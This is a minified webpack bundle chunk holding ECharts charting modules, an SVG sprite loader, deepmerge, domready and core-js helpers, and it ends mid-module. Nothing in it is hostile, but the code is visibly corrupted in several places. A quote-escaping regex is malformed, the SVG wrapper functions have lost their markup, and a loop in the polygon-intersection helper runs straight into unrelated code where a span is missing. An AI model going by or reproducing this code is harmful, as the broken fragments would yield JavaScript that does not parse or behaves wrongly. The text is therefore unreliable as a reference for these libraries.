i=n("4e08"),r=(i.__DEV__,n("3301")),o=n("4f85"),a=o.extend({type:"series.line",dependencies:["grid","polar"],getInitialData:function(e,t){return r(this.getSource(),this,{useEncodeDefaulter:!0})},defaultOption:{zlevel:0,z:2,coordinateSystem:"cartesian2d",legendHoverLink:!0,hoverAnimation:!0,clip:!0,label:{position:"top"},lineStyle:{width:2,type:"solid"},step:!1,smooth:!1,smoothMonotone:null,symbol:"emptyCircle",symbolSize:4,symbolRotate:null,showSymbol:!0,showAllSymbol:"auto",connectNulls:!1,sampling:"none",animationEasing:"linear",progressive:0,hoverLayerThreshold:1/0}});e.exports=a},"217c":function(e,t,n){var i=n("6d8b"),r=n("6cb7");n("df3a");var o=r.extend({type:"parallel",dependencies:["parallelAxis"],coordinateSystem:null,dimensions:null,parallelAxisIndex:null,layoutMode:"box",defaultOption:{zlevel:0,z:0,left:80,top:60,right:80,bottom:60,layout:"horizontal",axisExpandable:!1,axisExpandCenter:null,axisExpandCount:0,axisExpandWidth:50,axisExpandRate:17,axisExpandDebounce:50,axisExpandSlideTriggerArea:[-.15,.05,.4],axisExpandTriggerOn:"click",parallelAxisDefault:null},init:function(){r.prototype.init.apply(this,arguments),this.mergeOption({})},mergeOption:function(e){var t=this.option;e&&i.merge(t,e,!0),this._initDimensions()},contains:function(e,t){var n=e.get("parallelIndex");return null!=n&&t.getComponent("parallel",n)===this},setAxisExpand:function(e){i.each(["axisExpandable","axisExpandCenter","axisExpandCount","axisExpandWidth","axisExpandWindow"],(function(t){e.hasOwnProperty(t)&&(this.option[t]=e[t])}),this)},_initDimensions:function(){var e=this.dimensions=[],t=this.parallelAxisIndex=[],n=i.filter(this.dependentModels.parallelAxis,(function(e){return(e.get("parallelIndex")||0)===this.componentIndex}),this);i.each(n,(function(n){e.push("dim"+n.get("dim")),t.push(n.componentIndex)}))}});e.exports=o},"21a1":function(e,t,n){(function(t){(function(t,n){e.exports=n()})(0,(function(){"use strict";"undefined"!==typeof window?window:"undefined"!==typeof t||"undefined"!==typeof self&&self;function e(e,t){return t={exports:{}},e(t,t.exports),t.exports}var n=e((function(e,t){(function(t,n){e.exports=n()})(0,(function(){function e(e){var t=e&&"object"===typeof e;return t&&"[object RegExp]"!==Object.prototype.toString.call(e)&&"[object Date]"!==Object.prototype.toString.call(e)}function t(e){return Array.isArray(e)?[]:{}}function n(n,i){var r=i&&!0===i.clone;return r&&e(n)?o(t(n),n,i):n}function i(t,i,r){var a=t.slice();return i.forEach((function(i,s){"undefined"===typeof a[s]?a[s]=n(i,r):e(i)?a[s]=o(t[s],i,r):-1===t.indexOf(i)&&a.push(n(i,r))})),a}function r(t,i,r){var a={};return e(t)&&Object.keys(t).forEach((function(e){a[e]=n(t[e],r)})),Object.keys(i).forEach((function(s){e(i[s])&&t[s]?a[s]=o(t[s],i[s],r):a[s]=n(i[s],r)})),a}function o(e,t,o){var a=Array.isArray(t),s=o||{arrayMerge:i},l=s.arrayMerge||i;return a?Array.isArray(e)?l(e,t,o):n(t,o):r(e,t,o)}return o.all=function(e,t){if(!Array.isArray(e)||e.length<2)throw new Error("first argument should be an array with at least two elements");return e.reduce((function(e,n){return o(e,n,t)}))},o}))}));function i(e){return e=e||Object.create(null),{on:function(t,n){(e[t]||(e[t]=[])).push(n)},off:function(t,n){e[t]&&e[t].splice(e[t].indexOf(n)>>>0,1)},emit:function(t,n){(e[t]||[]).map((function(e){e(n)})),(e["*"]||[]).map((function(e){e(t,n)}))}}}var r=e((function(e,t){var n={svg:{name:"xmlns",uri:"http://www.w3.org/2000/svg"},xlink:{name:"xmlns:xlink",uri:"http://www.w3.org/1999/xlink"}};t.default=n,e.exports=t.default})),o=function(e){return Object.keys(e).map((function(t){var n=e[t].toString().replace(/"/g,""");return t+'="'+n+'"'})).join(" ")},a=r.svg,s=r.xlink,l={};l[a.name]=a.uri,l[s.name]=s.uri;var u,c=function(e,t){void 0===e&&(e="");var i=n(l,t||{}),r=o(i);return""+e+""},h=r.svg,d=r.xlink,f={attrs:(u={style:["position: absolute","width: 0","height: 0"].join("; ")},u[h.name]=h.uri,u[d.name]=d.uri,u)},p=function(e){this.config=n(f,e||{}),this.symbols=[]};p.prototype.add=function(e){var t=this,n=t.symbols,i=this.find(e.id);return i?(n[n.indexOf(i)]=e,!1):(n.push(e),!0)},p.prototype.remove=function(e){var t=this,n=t.symbols,i=this.find(e);return!!i&&(n.splice(n.indexOf(i),1),i.destroy(),!0)},p.prototype.find=function(e){return this.symbols.filter((function(t){return t.id===e}))[0]||null},p.prototype.has=function(e){return null!==this.find(e)},p.prototype.stringify=function(){var e=this.config,t=e.attrs,n=this.symbols.map((function(e){return e.stringify()})).join("");return c(n,t)},p.prototype.toString=function(){return this.stringify()},p.prototype.destroy=function(){this.symbols.forEach((function(e){return e.destroy()}))};var g=function(e){var t=e.id,n=e.viewBox,i=e.content;this.id=t,this.viewBox=n,this.content=i};g.prototype.stringify=function(){return this.content},g.prototype.toString=function(){return this.stringify()},g.prototype.destroy=function(){var e=this;["id","viewBox","content"].forEach((function(t){return delete e[t]}))};var m=function(e){var t=!!document.importNode,n=(new DOMParser).parseFromString(e,"image/svg+xml").documentElement;return t?document.importNode(n,!0):n},v=function(e){function t(){e.apply(this,arguments)}e&&(t.__proto__=e),t.prototype=Object.create(e&&e.prototype),t.prototype.constructor=t;var n={isMounted:{}};return n.isMounted.get=function(){return!!this.node},t.createFromExistingNode=function(e){return new t({id:e.getAttribute("id"),viewBox:e.getAttribute("viewBox"),content:e.outerHTML})},t.prototype.destroy=function(){this.isMounted&&this.unmount(),e.prototype.destroy.call(this)},t.prototype.mount=function(e){if(this.isMounted)return this.node;var t="string"===typeof e?document.querySelector(e):e,n=this.render();return this.node=n,t.appendChild(n),n},t.prototype.render=function(){var e=this.stringify();return m(c(e)).childNodes[0]},t.prototype.unmount=function(){this.node.parentNode.removeChild(this.node)},Object.defineProperties(t.prototype,n),t}(g),y={autoConfigure:!0,mountTo:"body",syncUrlsWithBaseTag:!1,listenLocationChangeEvent:!0,locationChangeEvent:"locationChange",locationChangeAngularEmitter:!1,usagesToUpdate:"use[*|href]",moveGradientsOutsideSymbol:!1},_=function(e){return Array.prototype.slice.call(e,0)},b=navigator.userAgent,x={isChrome:/chrome/i.test(b),isFirefox:/firefox/i.test(b),isIE:/msie/i.test(b)||/trident/i.test(b),isEdge:/edge/i.test(b)},w=function(e,t){var n=document.createEvent("CustomEvent");n.initCustomEvent(e,!1,!1,t),window.dispatchEvent(n)},k=function(e){var t=[];return _(e.querySelectorAll("style")).forEach((function(e){e.textContent+="",t.push(e)})),t},S=function(e){return(e||window.location.href).split("#")[0]},M=function(e){angular.module("ng").run(["$rootScope",function(t){t.$on("$locationChangeSuccess",(function(t,n,i){w(e,{oldUrl:i,newUrl:n})}))}])},A="linearGradient, radialGradient, pattern",C=function(e,t){return void 0===t&&(t=A),_(e.querySelectorAll("symbol")).forEach((function(e){_(e.querySelectorAll(t)).forEach((function(t){e.parentNode.insertBefore(t,e)}))})),e};function T(e,t){var n=_(e).reduce((function(e,n){if(!n.attributes)return e;var i=_(n.attributes),r=t?i.filter(t):i;return e.concat(r)}),[]);return n}var I=r.xlink.uri,D="xlink:href",L=/[{}|\\\^\[\]`"<>]/g;function E(e){return e.replace(L,(function(e){return"%"+e[0].charCodeAt(0).toString(16).toUpperCase()}))}function O(e,t,n){return _(e).forEach((function(e){var i=e.getAttribute(D);if(i&&0===i.indexOf(t)){var r=i.replace(t,n);e.setAttributeNS(I,D,r)}})),e}var P,R=["clipPath","colorProfile","src","cursor","fill","filter","marker","markerStart","markerMid","markerEnd","mask","stroke","style"],N=R.map((function(e){return"["+e+"]"})).join(","),z=function(e,t,n,i){var r=E(n),o=E(i),a=e.querySelectorAll(N),s=T(a,(function(e){var t=e.localName,n=e.value;return-1!==R.indexOf(t)&&-1!==n.indexOf("url("+r)}));s.forEach((function(e){return e.value=e.value.replace(r,o)})),O(t,r,o)},F={MOUNT:"mount",SYMBOL_MOUNT:"symbol_mount"},V=function(e){function t(t){var r=this;void 0===t&&(t={}),e.call(this,n(y,t));var o=i();this._emitter=o,this.node=null;var a=this,s=a.config;if(s.autoConfigure&&this._autoConfigure(t),s.syncUrlsWithBaseTag){var l=document.getElementsByTagName("base")[0].getAttribute("href");o.on(F.MOUNT,(function(){return r.updateUrls("#",l)}))}var u=this._handleLocationChange.bind(this);this._handleLocationChange=u,s.listenLocationChangeEvent&&window.addEventListener(s.locationChangeEvent,u),s.locationChangeAngularEmitter&&M(s.locationChangeEvent),o.on(F.MOUNT,(function(e){s.moveGradientsOutsideSymbol&&C(e)})),o.on(F.SYMBOL_MOUNT,(function(e){s.moveGradientsOutsideSymbol&&C(e.parentNode),(x.isIE||x.isEdge)&&k(e)}))}e&&(t.__proto__=e),t.prototype=Object.create(e&&e.prototype),t.prototype.constructor=t;var r={isMounted:{}};return r.isMounted.get=function(){return!!this.node},t.prototype._autoConfigure=function(e){var t=this,n=t.config;"undefined"===typeof e.syncUrlsWithBaseTag&&(n.syncUrlsWithBaseTag="undefined"!==typeof document.getElementsByTagName("base")[0]),"undefined"===typeof e.locationChangeAngularEmitter&&(n.locationChangeAngularEmitter="angular"in window),"undefined"===typeof e.moveGradientsOutsideSymbol&&(n.moveGradientsOutsideSymbol=x.isFirefox)},t.prototype._handleLocationChange=function(e){var t=e.detail,n=t.oldUrl,i=t.newUrl;this.updateUrls(n,i)},t.prototype.add=function(t){var n=this,i=e.prototype.add.call(this,t);return this.isMounted&&i&&(t.mount(n.node),this._emitter.emit(F.SYMBOL_MOUNT,t.node)),i},t.prototype.attach=function(e){var t=this,n=this;if(n.isMounted)return n.node;var i="string"===typeof e?document.querySelector(e):e;return n.node=i,this.symbols.forEach((function(e){e.mount(n.node),t._emitter.emit(F.SYMBOL_MOUNT,e.node)})),_(i.querySelectorAll("symbol")).forEach((function(e){var t=v.createFromExistingNode(e);t.node=e,n.add(t)})),this._emitter.emit(F.MOUNT,i),i},t.prototype.destroy=function(){var e=this,t=e.config,n=e.symbols,i=e._emitter;n.forEach((function(e){return e.destroy()})),i.off("*"),window.removeEventListener(t.locationChangeEvent,this._handleLocationChange),this.isMounted&&this.unmount()},t.prototype.mount=function(e,t){void 0===e&&(e=this.config.mountTo),void 0===t&&(t=!1);var n=this;if(n.isMounted)return n.node;var i="string"===typeof e?document.querySelector(e):e,r=n.render();return this.node=r,t&&i.childNodes[0]?i.insertBefore(r,i.childNodes[0]):i.appendChild(r),this._emitter.emit(F.MOUNT,r),r},t.prototype.render=function(){return m(this.stringify())},t.prototype.unmount=function(){this.node.parentNode.removeChild(this.node)},t.prototype.updateUrls=function(e,t){if(!this.isMounted)return!1;var n=document.querySelectorAll(this.config.usagesToUpdate);return z(this.node,n,S(e)+"#",S(t)+"#"),!0},Object.defineProperties(t.prototype,r),t}(p),B=e((function(e){ +/*! + * domready (c) Dustin Diaz 2014 - License MIT + */ +!function(t,n){e.exports=n()}(0,(function(){var e,t=[],n=document,i=n.documentElement.doScroll,r="DOMContentLoaded",o=(i?/^loaded|^c/:/^loaded|^i|^c/).test(n.readyState);return o||n.addEventListener(r,e=function(){n.removeEventListener(r,e),o=1;while(e=t.shift())e()}),function(e){o?setTimeout(e,0):t.push(e)}}))})),j="__SVG_SPRITE_NODE__",H="__SVG_SPRITE__",q=!!window[H];q?P=window[H]:(P=new V({attrs:{id:j}}),window[H]=P);var G=function(){var e=document.getElementById(j);e?P.attach(e):P.mount(document.body,!0)};document.body?G():B(G);var W=P;return W}))}).call(this,n("c8ba"))},2236:function(e,t,n){var i=n("5a43");function r(e){if(Array.isArray(e))return i(e)}e.exports=r,e.exports.__esModule=!0,e.exports["default"]=e.exports},2266:function(e,t,n){var i=n("825a"),r=n("e95a"),o=n("50c4"),a=n("0366"),s=n("35a1"),l=n("9bdd"),u=function(e,t){this.stopped=e,this.result=t},c=e.exports=function(e,t,n,c,h){var d,f,p,g,m,v,y,_=a(t,n,c?2:1);if(h)d=e;else{if(f=s(e),"function"!=typeof f)throw TypeError("Target is not iterable");if(r(f)){for(p=0,g=o(e.length);g>p;p++)if(m=c?_(i(y=e[p])[0],y[1]):_(e[p]),m&&m instanceof u)return m;return new u(!1)}d=f.call(e)}v=d.next;while(!(y=v.call(d)).done)if(m=l(d,_,y.value,c),"object"==typeof m&&m&&m instanceof u)return m;return new u(!1)};c.stop=function(e){return new u(!0,e)}},"22d1":function(e,t){var n={};n="object"===typeof wx&&"function"===typeof wx.getSystemInfoSync?{browser:{},os:{},node:!1,wxa:!0,canvasSupported:!0,svgSupported:!1,touchEventsSupported:!0,domSupported:!1}:"undefined"===typeof document&&"undefined"!==typeof self?{browser:{},os:{},node:!1,worker:!0,canvasSupported:!0,domSupported:!1}:"undefined"===typeof navigator?{browser:{},os:{},node:!0,worker:!1,canvasSupported:!0,svgSupported:!0,domSupported:!1}:r(navigator.userAgent);var i=n;function r(e){var t={},n={},i=e.match(/Firefox\/([\d.]+)/),r=e.match(/MSIE\s([\d.]+)/)||e.match(/Trident\/.+?rv:(([\d.]+))/),o=e.match(/Edge\/([\d.]+)/),a=/micromessenger/i.test(e);return i&&(n.firefox=!0,n.version=i[1]),r&&(n.ie=!0,n.version=r[1]),o&&(n.edge=!0,n.version=o[1]),a&&(n.weChat=!0),{browser:n,os:t,node:!1,canvasSupported:!!document.createElement("canvas").getContext,svgSupported:"undefined"!==typeof SVGRect,touchEventsSupported:"ontouchstart"in window&&!n.ie&&!n.edge,pointerEventsSupported:"onpointerdown"in window&&(n.edge||n.ie&&n.version>=11),domSupported:"undefined"!==typeof document}}e.exports=i},"22da":function(e,t,n){var i=n("f934");function r(e){e.hierNode={defaultAncestor:null,ancestor:e,prelim:0,modifier:0,change:0,shift:0,i:0,thread:null};var t,n,i=[e];while(t=i.pop())if(n=t.children,t.isExpand&&n.length)for(var r=n.length,o=r-1;o>=0;o--){var a=n[o];a.hierNode={defaultAncestor:null,ancestor:a,prelim:0,modifier:0,change:0,shift:0,i:o,thread:null},i.push(a)}}function o(e,t){var n=e.isExpand?e.children:[],i=e.parentNode.children,r=e.hierNode.i?i[e.hierNode.i-1]:null;if(n.length){c(e);var o=(n[0].hierNode.prelim+n[n.length-1].hierNode.prelim)/2;r?(e.hierNode.prelim=r.hierNode.prelim+t(e,r),e.hierNode.modifier=e.hierNode.prelim-o):e.hierNode.prelim=o}else r&&(e.hierNode.prelim=r.hierNode.prelim+t(e,r));e.parentNode.hierNode.defaultAncestor=h(e,r,e.parentNode.hierNode.defaultAncestor||i[0],t)}function a(e){var t=e.hierNode.prelim+e.parentNode.hierNode.modifier;e.setLayout({x:t},!0),e.hierNode.modifier+=e.parentNode.hierNode.modifier}function s(e){return arguments.length?e:m}function l(e,t){var n={};return e-=Math.PI/2,n.x=t*Math.cos(e),n.y=t*Math.sin(e),n}function u(e,t){return i.getLayoutRect(e.getBoxLayoutParams(),{width:t.getWidth(),height:t.getHeight()})}function c(e){var t=e.children,n=t.length,i=0,r=0;while(--n>=0){var o=t[n];o.hierNode.prelim+=i,o.hierNode.modifier+=i,r+=o.hierNode.change,i+=o.hierNode.shift+r}}function h(e,t,n,i){if(t){var r=e,o=e,a=o.parentNode.children[0],s=t,l=r.hierNode.modifier,u=o.hierNode.modifier,c=a.hierNode.modifier,h=s.hierNode.modifier;while(s=d(s),o=f(o),s&&o){r=d(r),a=f(a),r.hierNode.ancestor=e;var m=s.hierNode.prelim+h-o.hierNode.prelim-u+i(s,o);m>0&&(g(p(s,e,n),e,m),u+=m,l+=m),h+=s.hierNode.modifier,u+=o.hierNode.modifier,l+=r.hierNode.modifier,c+=a.hierNode.modifier}s&&!d(r)&&(r.hierNode.thread=s,r.hierNode.modifier+=h-l),o&&!f(a)&&(a.hierNode.thread=o,a.hierNode.modifier+=u-c,n=e)}return n}function d(e){var t=e.children;return t.length&&e.isExpand?t[t.length-1]:e.hierNode.thread}function f(e){var t=e.children;return t.length&&e.isExpand?t[0]:e.hierNode.thread}function p(e,t,n){return e.hierNode.ancestor.parentNode===t.parentNode?e.hierNode.ancestor:n}function g(e,t,n){var i=n/(t.hierNode.i-e.hierNode.i);t.hierNode.change-=i,t.hierNode.shift+=n,t.hierNode.modifier+=n,t.hierNode.prelim+=n,e.hierNode.change+=i}function m(e,t){return e.parentNode===t.parentNode?1:2}t.init=r,t.firstWalk=o,t.secondWalk=a,t.separation=s,t.radialCoordinate=l,t.getViewRect=u},2306:function(e,t,n){var i=n("6d8b"),r=n("342d"),o=n("41ef"),a=n("1687"),s=n("401b"),l=n("cbe5"),u=n("0cde"),c=n("0da8");t.Image=c;var h=n("e1fc");t.Group=h;var d=n("76a5");t.Text=d;var f=n("d9fc");t.Circle=f;var p=n("4aa2");t.Sector=p;var g=n("4573");t.Ring=g;var m=n("87b1");t.Polygon=m;var v=n("d498");t.Polyline=v;var y=n("c7a2");t.Rect=y;var _=n("cb11");t.Line=_;var b=n("ac0f");t.BezierCurve=b;var x=n("8d32");t.Arc=x;var w=n("d4c6");t.CompoundPath=w;var k=n("48a9");t.LinearGradient=k;var S=n("dded");t.RadialGradient=S;var M=n("9850");t.BoundingRect=M;var A=n("392f");t.IncrementalDisplayable=A;var C=n("9cf9"),T=Math.max,I=Math.min,D={},L=1,E={color:"textFill",textBorderColor:"textStroke",textBorderWidth:"textStrokeWidth"},O="emphasis",P="normal",R=1,N={},z={};function F(e){return l.extend(e)}function V(e,t){return r.extendFromString(e,t)}function B(e,t){z[e]=t}function j(e){if(z.hasOwnProperty(e))return z[e]}function H(e,t,n,i){var o=r.createFromString(e,t);return n&&("center"===i&&(n=G(n,o.getBoundingRect())),$(o,n)),o}function q(e,t,n){var i=new c({style:{image:e,x:t.x,y:t.y,width:t.width,height:t.height},onload:function(e){if("center"===n){var r={width:e.width,height:e.height};i.setStyle(G(t,r))}}});return i}function G(e,t){var n,i=t.width/t.height,r=e.height*i;r<=e.width?n=e.height:(r=e.width,n=r/i);var o=e.x+e.width/2,a=e.y+e.height/2;return{x:o-r/2,y:a-n/2,width:r,height:n}}var W=r.mergePath;function $(e,t){if(e.applyTransform){var n=e.getBoundingRect(),i=n.calculateTransform(t);e.applyTransform(i)}}function U(e){return C.subPixelOptimizeLine(e.shape,e.shape,e.style),e}function Z(e){return C.subPixelOptimizeRect(e.shape,e.shape,e.style),e}var Y=C.subPixelOptimize;function X(e){return null!=e&&"none"!==e}var K=i.createHashMap(),J=0;function Q(e){if("string"!==typeof e)return e;var t=K.get(e);return t||(t=o.lift(e,-.1),J<1e4&&(K.set(e,t),J++)),t}function ee(e){if(e.__hoverStlDirty){e.__hoverStlDirty=!1;var t=e.__hoverStl;if(t){var n=e.__cachedNormalStl={};e.__cachedNormalZ2=e.z2;var i=e.style;for(var r in t)null!=t[r]&&(n[r]=i[r]);n.fill=i.fill,n.stroke=i.stroke}else e.__cachedNormalStl=e.__cachedNormalZ2=null}}function te(e){var t=e.__hoverStl;if(t&&!e.__highlighted){var n=e.__zr,i=e.useHoverLayer&&n&&"canvas"===n.painter.type;if(e.__highlighted=i?"layer":"plain",!(e.isGroup||!n&&e.useHoverLayer)){var r=e,o=e.style;i&&(r=n.addHover(e),o=r.style),Se(o),i||ee(r),o.extendFrom(t),ne(o,t,"fill"),ne(o,t,"stroke"),ke(o),i||(e.dirty(!1),e.z2+=L)}}}function ne(e,t,n){!X(t[n])&&X(e[n])&&(e[n]=Q(e[n]))}function ie(e){var t=e.__highlighted;if(t&&(e.__highlighted=!1,!e.isGroup))if("layer"===t)e.__zr&&e.__zr.removeHover(e);else{var n=e.style,i=e.__cachedNormalStl;i&&(Se(n),e.setStyle(i),ke(n));var r=e.__cachedNormalZ2;null!=r&&e.z2-r===L&&(e.z2=r)}}function re(e,t,n){var i,r=P,o=P;e.__highlighted&&(r=O,i=!0),t(e,n),e.__highlighted&&(o=O,i=!0),e.isGroup&&e.traverse((function(e){!e.isGroup&&t(e,n)})),i&&e.__highDownOnUpdate&&e.__highDownOnUpdate(r,o)}function oe(e,t){t=e.__hoverStl=!1!==t&&(e.hoverStyle||t||{}),e.__hoverStlDirty=!0,e.__highlighted&&(e.__cachedNormalStl=null,ie(e),te(e))}function ae(e){!ce(this,e)&&!this.__highByOuter&&re(this,te)}function se(e){!ce(this,e)&&!this.__highByOuter&&re(this,ie)}function le(e){this.__highByOuter|=1<<(e||0),re(this,te)}function ue(e){!(this.__highByOuter&=~(1<<(e||0)))&&re(this,ie)}function ce(e,t){return e.__highDownSilentOnTouch&&t.zrByTouch}function he(e,t){de(e,!0),re(e,oe,t)}function de(e,t){var n=!1===t;if(e.__highDownSilentOnTouch=e.highDownSilentOnTouch,e.__highDownOnUpdate=e.highDownOnUpdate,!n||e.__highDownDispatcher){var i=n?"off":"on";e[i]("mouseover",ae)[i]("mouseout",se),e[i]("emphasis",le)[i]("normal",ue),e.__highByOuter=e.__highByOuter||0,e.__highDownDispatcher=!n}}function fe(e){return!(!e||!e.__highDownDispatcher)}function pe(e){var t=N[e];return null==t&&R<=32&&(t=N[e]=R++),t}function ge(e,t,n,r,o,a,s){o=o||D;var l,u=o.labelFetcher,c=o.labelDataIndex,h=o.labelDimIndex,d=o.labelProp,f=n.getShallow("show"),p=r.getShallow("show");(f||p)&&(u&&(l=u.getFormattedLabel(c,"normal",null,h,d)),null==l&&(l=i.isFunction(o.defaultText)?o.defaultText(c,o):o.defaultText));var g=f?l:null,m=p?i.retrieve2(u?u.getFormattedLabel(c,"emphasis",null,h,d):null,l):null;null==g&&null==m||(ve(e,n,a,o),ve(t,r,s,o,!0)),e.text=g,t.text=m}function me(e,t,n){var r=e.style;t&&(Se(r),e.setStyle(t),ke(r)),r=e.__hoverStl,n&&r&&(Se(r),i.extend(r,n),ke(r))}function ve(e,t,n,r,o){return _e(e,t,r,o),n&&i.extend(e,n),e}function ye(e,t,n){var i,r={isRectText:!0};!1===n?i=!0:r.autoColor=n,_e(e,t,r,i)}function _e(e,t,n,r){if(n=n||D,n.isRectText){var o;n.getTextPosition?o=n.getTextPosition(t,r):(o=t.getShallow("position")||(r?null:"inside"),"outside"===o&&(o="top")),e.textPosition=o,e.textOffset=t.getShallow("offset");var a=t.getShallow("rotate");null!=a&&(a*=Math.PI/180),e.textRotation=a,e.textDistance=i.retrieve2(t.getShallow("distance"),r?null:5)}var s,l=t.ecModel,u=l&&l.option.textStyle,c=be(t);if(c)for(var h in s={},c)if(c.hasOwnProperty(h)){var d=t.getModel(["rich",h]);xe(s[h]={},d,u,n,r)}return e.rich=s,xe(e,t,u,n,r,!0),n.forceRich&&!n.textStyle&&(n.textStyle={}),e}function be(e){var t;while(e&&e!==e.ecModel){var n=(e.option||D).rich;if(n)for(var i in t=t||{},n)n.hasOwnProperty(i)&&(t[i]=1);e=e.parentModel}return t}function xe(e,t,n,r,o,a){n=!o&&n||D,e.textFill=we(t.getShallow("color"),r)||n.color,e.textStroke=we(t.getShallow("textBorderColor"),r)||n.textBorderColor,e.textStrokeWidth=i.retrieve2(t.getShallow("textBorderWidth"),n.textBorderWidth),o||(a&&(e.insideRollbackOpt=r,ke(e)),null==e.textFill&&(e.textFill=r.autoColor)),e.fontStyle=t.getShallow("fontStyle")||n.fontStyle,e.fontWeight=t.getShallow("fontWeight")||n.fontWeight,e.fontSize=t.getShallow("fontSize")||n.fontSize,e.fontFamily=t.getShallow("fontFamily")||n.fontFamily,e.textAlign=t.getShallow("align"),e.textVerticalAlign=t.getShallow("verticalAlign")||t.getShallow("baseline"),e.textLineHeight=t.getShallow("lineHeight"),e.textWidth=t.getShallow("width"),e.textHeight=t.getShallow("height"),e.textTag=t.getShallow("tag"),a&&r.disableBox||(e.textBackgroundColor=we(t.getShallow("backgroundColor"),r),e.textPadding=t.getShallow("padding"),e.textBorderColor=we(t.getShallow("borderColor"),r),e.textBorderWidth=t.getShallow("borderWidth"),e.textBorderRadius=t.getShallow("borderRadius"),e.textBoxShadowColor=t.getShallow("shadowColor"),e.textBoxShadowBlur=t.getShallow("shadowBlur"),e.textBoxShadowOffsetX=t.getShallow("shadowOffsetX"),e.textBoxShadowOffsetY=t.getShallow("shadowOffsetY")),e.textShadowColor=t.getShallow("textShadowColor")||n.textShadowColor,e.textShadowBlur=t.getShallow("textShadowBlur")||n.textShadowBlur,e.textShadowOffsetX=t.getShallow("textShadowOffsetX")||n.textShadowOffsetX,e.textShadowOffsetY=t.getShallow("textShadowOffsetY")||n.textShadowOffsetY}function we(e,t){return"auto"!==e?e:t&&t.autoColor?t.autoColor:null}function ke(e){var t,n=e.textPosition,i=e.insideRollbackOpt;if(i&&null==e.textFill){var r=i.autoColor,o=i.isRectText,a=i.useInsideStyle,s=!1!==a&&(!0===a||o&&n&&"string"===typeof n&&n.indexOf("inside")>=0),l=!s&&null!=r;(s||l)&&(t={textFill:e.textFill,textStroke:e.textStroke,textStrokeWidth:e.textStrokeWidth}),s&&(e.textFill="#fff",null==e.textStroke&&(e.textStroke=r,null==e.textStrokeWidth&&(e.textStrokeWidth=2))),l&&(e.textFill=r)}e.insideRollback=t}function Se(e){var t=e.insideRollback;t&&(e.textFill=t.textFill,e.textStroke=t.textStroke,e.textStrokeWidth=t.textStrokeWidth,e.insideRollback=null)}function Me(e,t){var n=t&&t.getModel("textStyle");return i.trim([e.fontStyle||n&&n.getShallow("fontStyle")||"",e.fontWeight||n&&n.getShallow("fontWeight")||"",(e.fontSize||n&&n.getShallow("fontSize")||12)+"px",e.fontFamily||n&&n.getShallow("fontFamily")||"sans-serif"].join(" "))}function Ae(e,t,n,i,r,o){"function"===typeof r&&(o=r,r=null);var a=i&&i.isAnimationEnabled();if(a){var s=e?"Update":"",l=i.getShallow("animationDuration"+s),u=i.getShallow("animationEasing"+s),c=i.getShallow("animationDelay"+s);"function"===typeof c&&(c=c(r,i.getAnimationDelayParams?i.getAnimationDelayParams(t,r):null)),"function"===typeof l&&(l=l(r)),l>0?t.animateTo(n,l,c||0,u,o,!!o):(t.stopAnimation(),t.attr(n),o&&o())}else t.stopAnimation(),t.attr(n),o&&o()}function Ce(e,t,n,i,r){Ae(!0,e,t,n,i,r)}function Te(e,t,n,i,r){Ae(!1,e,t,n,i,r)}function Ie(e,t){var n=a.identity([]);while(e&&e!==t)a.mul(n,e.getLocalTransform(),n),e=e.parent;return n}function De(e,t,n){return t&&!i.isArrayLike(t)&&(t=u.getLocalTransform(t)),n&&(t=a.invert([],t)),s.applyTransform([],e,t)}function Le(e,t,n){var i=0===t[4]||0===t[5]||0===t[0]?1:Math.abs(2*t[4]/t[0]),r=0===t[4]||0===t[5]||0===t[2]?1:Math.abs(2*t[4]/t[2]),o=["left"===e?-i:"right"===e?i:0,"top"===e?-r:"bottom"===e?r:0];return o=De(o,t,n),Math.abs(o[0])>Math.abs(o[1])?o[0]>0?"right":"left":o[1]>0?"bottom":"top"}function Ee(e,t,n,r){if(e&&t){var o=a(e);t.traverse((function(e){if(!e.isGroup&&e.anid){var t=o[e.anid];if(t){var i=l(e);e.attr(l(t)),Ce(e,i,n,e.dataIndex)}}}))}function a(e){var t={};return e.traverse((function(e){!e.isGroup&&e.anid&&(t[e.anid]=e)})),t}function l(e){var t={position:s.clone(e.position),rotation:e.rotation};return e.shape&&(t.shape=i.extend({},e.shape)),t}}function Oe(e,t){return i.map(e,(function(e){var n=e[0];n=T(n,t.x),n=I(n,t.x+t.width);var i=e[1];return i=T(i,t.y),i=I(i,t.y+t.height),[n,i]}))}function Pe(e,t){var n=T(e.x,t.x),i=I(e.x+e.width,t.x+t.width),r=T(e.y,t.y),o=I(e.y+e.height,t.y+t.height);if(i>=n&&o>=r)return{x:n,y:r,width:i-n,height:o-r}}function Re(e,t,n){t=i.extend({rectHover:!0},t);var r=t.style={strokeNoScale:!0};if(n=n||{x:-1,y:-1,width:2,height:2},e)return 0===e.indexOf("image://")?(r.image=e.slice(8),i.defaults(r,n),new c(t)):H(e.replace("path://",""),t,n,"center")}function Ne(e,t,n,i,r){for(var o=0,a=r[r.length-1];o1)return!1;var m=Fe(f,p,c,h)/d;return!(m<0||m>1)}function Fe(e,t,n,i){return e*i-n*t}function Ve(e){return e<=1e-6&&e>=-1e-6}B("circle",f),B("sector",p),B("ring",g),B("polygon",m),B("polyline",v),B("rect",y),B("line",_),B("bezierCurve",b),B("arc",x),t.Z2_EMPHASIS_LIFT=L,t.CACHED_LABEL_STYLE_PROPERTIES=E,t.extendShape=F,t.extendPath=V,t.registerShape=B,t.getShapeClass=j,t.makePath=H,t.makeImage=q,t.mergePath=W,t.resizePath=$,t.subPixelOptimizeLine=U,t.subPixelOptimizeRect=Z,t.subPixelOptimize=Y,t.setElementHoverStyle=oe,t.setHoverStyle=he,t.setAsHighDownDispatcher=de,t.isHighDownDispatcher=fe,t.getHighlightDigit=pe,t.setLabelStyle=ge,t.modifyLabelStyle=me,t.setTextStyle=ve,t.setText=ye,t.getFont=Me,t.updateProps=Ce,t.initProps=Te,t.getTransform=Ie,t.applyTransform=De,t.transformDirection=Le,t.groupTransition=Ee,t.clipPointsByRect=Oe,t.clipRectByRect=Pe,t.createIcon=Re,t.linePolygonIntersect=Ne,t.lineLineIntersect=ze},2325:function(e,t,n){var 